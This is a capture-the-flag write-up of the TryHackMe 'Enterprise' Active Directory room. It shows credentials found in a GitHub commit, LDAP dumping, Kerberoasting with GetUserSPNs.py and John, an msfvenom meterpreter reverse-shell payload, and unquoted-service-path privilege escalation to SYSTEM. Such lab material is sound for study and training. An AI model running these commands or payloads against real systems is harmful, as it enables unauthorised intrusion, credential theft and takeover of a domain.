Active Directory Pentest : Enterprise
Intro : It is a Hard Machine in TryHackMe based on Active Directory Pentesting. Here you have to compromise a Windows Domain Controller. Initial Foothold get as RDP and PrivEsc with Exploitation of Unquoted Service Path. So let’s start.
Nmap Scan :
As usual we start with a Basic Nmap Scan. I discovered Multiple Ports are open. From here 80, 88, 389 etc are Interesting. Also RDP is running on Port 3389.
Tip : nmap -sVC -p- -Pn -T4 <ip> -vv
Web Enumeration :
First I visit the Web-Server on Port 80. I found nothing here.
Then I start a simple GoBuster Scan for Directory Brute Force.
I found robots.txt but no Important notes there. It telling us to enumerate Services not the Web-Server. :)
But on Port 7990 I saw a Login Form and a Note telling us ‘Enterprise-THM’ moved to Github.
So I search for it in Google. And I found something. A github repository of User Nik.
Here I enter into his Repo (mgmtScript.ps1) but there is nothing in user and password field.
But in his History there is a Commit revealing the Username and Password.
Cred → nik : ToastyBoi!
Exploiting AD :
So what and I do with this Creds I try for RDP but it is not valid. Then I think I can dump domain Information (ldap) using aa tool called ‘ldapdomaindump’.
Tip : ldapdomaindump <ip> -u ‘LAB-ENTERPRISE\nik’ -p <password>
I got many Informative Files. But I found ‘domain_users.html’ file Interesting. So I open it.
Here we can easily see the Domain Information about Users. It tells us that nik can’t use RDP but BitBucker user can use RDP (Remote Desktop Protocol) as he is in Remote Desktop Users.
So with nik’s credentials we can try to get a ticket for a “Service Principal Name” to access that Service.
We use a Impacket Tool called GetUserSPNs.py.
Tip : python3 GetUserSPNs.py -dc-ip <ip> ‘LAB.ENTERPRISE.THM/nik:<password>’ -request
I get a Kerberos Ticket to access RDP. But we have to crack the hash with John. I put the total Hash in has.txt File.
Tip : john — wordlist=<path> has.txt
RDP Cred → bitbucket : <???>
Then I use xfreerdp tool to start RDP Session. You can also use Reminna or Rdesktop Tool.
Tip : xfreerdp /u:<username> /p:<password> /v:<ip>
User Access :
And I get the First User Flag on User’s Desktop.
Privilege Escalation :
Now it’s time for some PrivEsc. I send the winPEASx64.exe file in Victim’s and ran it for automation. I found a Unquoted Service Path which can be Exploitable. And it is running a Service called zerotieroneservice.
Path : C:\Program Files (x86)\Zero Tier\Zero Tier one
Look at the Path it is not in Quotation Mark but seperated with White Spaces.
More info → https://tryhackme.com/room/windows10privesc
So If the path is Writable we can craft a payload and exploit that Path to get Admin Access.
We I jump on that Path and it is writable.
Then I make a Windows Payload with msfvenom.
Tip : msfvenom -p windows/meterpreter/reverse_tcp LHOST=<tun0_ip> LPORT=<any_port> -f exe -o shell.exe
Then I send this File on Victim’s Machine.
Note : Download this exe Payload in C:\Program Files (x86)\Zero Tier\
Then I set my handler in Msfconsole.
Then I run that.
Then in the victim’s machine you have to stop and restart that Service running zerotieroneservice found in winPEAS result.
Then suddenly I get a Reverse Connection as system32 shell.
But the meterpreter session died after a Moment. So we can use a Trick. In Meterpreter Session run the below command.
Tip : migrate -N winlogon.exe
Then You will get a Stable Shell as Administrator User.
And at last I get the Root Flag. Bingoo!!!!!!
So we completed the Room And learned about Active Directory Pentesting.
If you enjoy it don’t Forget to Follow me for more Articles.
THANKS FOR READING!
Happy Hacking~
